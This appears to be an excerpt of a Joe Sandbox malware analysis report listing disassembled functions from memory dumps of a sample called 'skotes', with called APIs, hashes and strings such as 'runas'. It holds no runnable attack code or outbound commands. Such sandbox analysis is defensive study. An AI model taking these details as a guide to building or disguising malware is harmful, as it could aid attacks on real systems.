Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0041F330

Part of subcall function 004201B2: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004201CE

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0041F34C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0041F353

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction ID: fbdee06be22d7eb5cf524bde3a8873450c2cdba4fa94e97b4615b2f8ae6f40be
Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
Instruction Fuzzy Hash: 9C012B71500309BBD720AF66CC859DBFBA8EF10358B10453FFC1492152D778E98A87A9

Function 020D3628 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 020D3642
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 020D3656
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 020D366E
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 020D3686

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 6eb07f39d8bd18b0162b3959b34b2d6f2ab2a72a22ccef3f40d161704ba9bc1b
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 0D01D67A601314ABCF16AF598C40AEFB7AA9F84750F008095ED11A7381DA71ED11AEE2

Function 004333C1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004333DB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004333EF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00433407
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043341F

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 148698cb8657f3ab7a0d111eac04cd811a00bb0e29ba6abd34784ed5a644fba4
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 74012632700524A7CF16EF658841AAFB7A99F58314F00001BFC12EB382DA74EE1193A5

Function 020DBAA2 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,020DBC07,00000000,?,020E2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 020DBAB8
GetLastError.KERNEL32(?,020E2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,020DBC07,00000000,00000104,?), ref: 020DBAC2
__dosmaperr.LIBCMT ref: 020DBAC9

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction ID: 0b025042c6ed270f56a8d8984b622061864487f102a054e923ed698704a96f03
Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction Fuzzy Hash: A1F06231601715BB8B211FA6DC0895BFFA9FF453657064520F529C6420D731E811EBD0

Function 020DBB0B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,020DBC07,00000000,?,020E219D,00000000,00000000,020DBC07,?,?,00000000,00000000,00000001), ref: 020DBB21
GetLastError.KERNEL32(?,020E219D,00000000,00000000,020DBC07,?,?,00000000,00000000,00000001,00000000,00000000,?,020DBC07,00000000,00000104), ref: 020DBB2B
__dosmaperr.LIBCMT ref: 020DBB32

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction ID: 6c216b40cfd82fa4bf2ed96d1e9e266649064f046998fbab5cb8d50df1856109
Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction Fuzzy Hash: A3F01D32601715BBCB215BA2DC0899AFFBAFF443B97018525E529C7420DB71E851EBD4

Function 0043B83B Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B851
GetLastError.KERNEL32(?,00441FAB,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104,?), ref: 0043B85B
__dosmaperr.LIBCMT ref: 0043B862

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction ID: 4d38e234b28d8319e4134ca970a631ac6953b460d6f58f575e06abf1e175f512
Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
Instruction Fuzzy Hash: 51F06D36600615BBCB246FA6DC08E4BBF6DFF483A1B009126F61DC6521D735E811CBD8

Function 0043B8A4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0043B9A0,00000000,?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001), ref: 0043B8BA
GetLastError.KERNEL32(?,00441F36,00000000,00000000,0043B9A0,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B9A0,00000000,00000104), ref: 0043B8C4
__dosmaperr.LIBCMT ref: 0043B8CB

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction ID: fe454a788940d8d1b6a18dc845ad3b04fffb8540f5c3b85414d994226db15d49
Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
Instruction Fuzzy Hash: 26F06D72600619BB8B216BA6DC08B57BF69FF483A0B009526FA19C6521D739E861C7D8

Function 020C526C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 020C01CD: TlsGetValue.KERNEL32(?,?,020BF74E,020BF57B,?,?), ref: 020C01D3

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 020C5296

Part of subcall function 020CE575: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 020CE59C
Part of subcall function 020CE575: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 020CE5B5
Part of subcall function 020CE575: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 020CE62B
Part of subcall function 020CE575: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 020CE633

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 020C52A4
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 020C52AE
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 020C52B8

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction ID: 65329084db9b81452bbf6b943f7fc8b4a1df7c8aa6eaf6837e9631d969e5de47
Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction Fuzzy Hash: 20F021B5A0071467CB26B725CC105EDFBA75F81720F70402DE91153254DF74AA15EFC6

Function 00425005 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FF66: TlsGetValue.KERNEL32(?,?,0041F4E7,0041F314,?,?), ref: 0041FF6C

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042502F

Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E335
Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E34E
Part of subcall function 0042E30E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E3C4
Part of subcall function 0042E30E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E3CC

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042503D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425047
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425051

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction ID: 591bd9b18c1ea594323a38232f6cf7a467bdae74b08f21c6b28571b33805ae9f
Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
Instruction Fuzzy Hash: 2DF0F63170053927CA25B727E81286EF6659F91B58B80002FF91057252EF7C9E498BCE

Function 020BC86B Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020BFB78
Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 020BFBAB
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 020BFBB7
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 020BFBC0

Part of subcall function 020BF554: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 020BF576
Part of subcall function 020BF554: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 020BF597

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
String ID:
API String ID: 2559503089-0
Opcode ID: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
Instruction ID: 0b71bc4fd9da5ca57a5c1fd61a02f3d0f5e75f1f79d05e1ea198148eac483a28
Opcode Fuzzy Hash: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
Instruction Fuzzy Hash: 16F0B47164030AAA9F37BE744CA9DED72A78F90324B044169B5119B780CF718D00BA94

Function 00429510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519

Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99

Function 020E6D36 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(020A8A07,0000000F,0045FB20,00000000,020A8A07,?,020E5421,020A8A07,00000001,020A8A07,020A8A07,?,020E02FC,00000000,?,020A8A07), ref: 020E6D4D
GetLastError.KERNEL32(?,020E5421,020A8A07,00000001,020A8A07,020A8A07,?,020E02FC,00000000,?,020A8A07,00000000,020A8A07,?,020E0850,020A8A07), ref: 020E6D59

Part of subcall function 020E6D1F: CloseHandle.KERNEL32(00462970,020E6D69,?,020E5421,020A8A07,00000001,020A8A07,020A8A07,?,020E02FC,00000000,?,020A8A07,00000000,020A8A07), ref: 020E6D2F

___initconout.LIBCMT ref: 020E6D69

Part of subcall function 020E6CE1: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,020E6D10,020E540E,020A8A07,?,020E02FC,00000000,?,020A8A07,00000000), ref: 020E6CF4

WriteConsoleW.KERNEL32(020A8A07,0000000F,0045FB20,00000000,?,020E5421,020A8A07,00000001,020A8A07,020A8A07,?,020E02FC,00000000,?,020A8A07,00000000), ref: 020E6D7E

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: 832376be0ef6d74eaeff24d3c87d2ea229dc5f08c707d6dddf30172aa86b8a5f
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: ABF0F836501254BBCF621FA5AC08A993E6AEB493A1F104021FA1D86120D673C860EB95

Function 00446ACF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,004087A0,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0), ref: 00446AE6
GetLastError.KERNEL32(?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0,?,004405E9,004087A0), ref: 00446AF2

Part of subcall function 00446AB8: CloseHandle.KERNEL32(FFFFFFFE,00446B02,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0), ref: 00446AC8

___initconout.LIBCMT ref: 00446B02

Part of subcall function 00446A7A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446AA9,004451A7,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446A8D

WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446B17

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: 2847bb895f9299352194151eea3b2518d9960724f28a171724648c66562c6119
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 1DF03736101664BBDF621FA5DC089DA3F65FB457A2F014022FE1C95131D672DC20DB9A

Function 020A7A17 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 020A7CE0

Strings

runas, xrefs: 020A756A

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
Instruction ID: dfc20d1e0257190845178bccbe9010fdde53785b00d75437c9d2de16d0b3c929
Opcode Fuzzy Hash: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
Instruction Fuzzy Hash: 7EE15971A10344ABEB19EB78CD95BDDFB72EF81305FA0825CE4009B3D5DB358A409B92

Function 004077B0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 00407A79

Strings

runas, xrefs: 00407303

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: 881957725d7ee65a7f7f3f75449f95d7bbb280d7ad157871870bf31851af7815
Instruction ID: 16d312adbf3c5a63ffdf7f0f3d7c95d875241b4f4b30525d3919e6496bc747c1
Opcode Fuzzy Hash: 881957725d7ee65a7f7f3f75449f95d7bbb280d7ad157871870bf31851af7815
Instruction Fuzzy Hash: D0E13C71E14144ABEB08EB78CD8679D7B72DF42304F60815EF405A73C6DB7D9A80879A

Function 0043E6C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661), ref: 0043E722
GetCPInfo.KERNEL32(00000000,0043E512,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661,?), ref: 0043E764

Strings

avC, xrefs: 0043E6C6

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: avC
API String ID: 546120528-551859807
Opcode ID: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
Instruction ID: 7136e37640ab4f9cfa26bf5a46befe49b79dc652285453c6057786630530e70e
Opcode Fuzzy Hash: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
Instruction Fuzzy Hash: C6512370E012059EEB249F73C8806ABBBF5EF88304F14646FD096973D2E7789546CB99

Function 0044532F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000002,?,00000000,?,00000000,?), ref: 0044540D

Strings

)ZD, xrefs: 00445363
)ZD, xrefs: 004453BB, 004454C9

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: )ZD$)ZD
API String ID: 2738559852-3993371512
Opcode ID: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
Instruction ID: fc353a334f2b284155b366ba4413ab3dfc7edfe09a6423858d2821c62ff71e0d
Opcode Fuzzy Hash: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
Instruction Fuzzy Hash: 4651E731A04619EBDF20CF58C881BEDB7B0FF05314F20856AD855AB392E3785981CB99

Function 020DE717 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 020DE4C0: GetOEMCP.KERNEL32(00000000,020DE732,?,?,020D78C8,020D78C8,?), ref: 020DE4EB

_free.LIBCMT ref: 020DE78F

Strings

@"F, xrefs: 020DE7B7

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F
API String ID: 269201875-3084318295
Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction ID: 5ab8364caff493d74a9ab1865c93db94fef950cac8dc39061c90b55895a9248f
Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction Fuzzy Hash: 5F31C072901349AFCB52DFA8C884BDE7BF5FF44314F15046AEA149B2A0EB719940DF60

Function 0041B5D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0041B65E
RaiseException.KERNEL32(?,?,?,?), ref: 0041B683

Part of subcall function 00433B04: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E3B0,?,?,?,0045E3B0), ref: 00433B64

Part of subcall function 00438BEC: IsProcessorFeaturePresent.KERNEL32(00000017,0043A72D,?,?,0043694A,?,?,?,?,00437661,?), ref: 00438C08

Strings

csm, xrefs: 0041B612

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
Instruction ID: 9f88b0b7aede3b21d37810e77ce6789f3a807ab352a7de9bd37fa5025d97b667
Opcode Fuzzy Hash: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
Instruction Fuzzy Hash: A721AF31D01218AFCF24DF96C945AEFB7B8EF24714F14441AE845AB251CB38AD85CBCA

Function 00431704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF

Strings

pContext, xrefs: 004317A7

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
Opcode Fuzzy Hash: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8

Function 020DA995 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

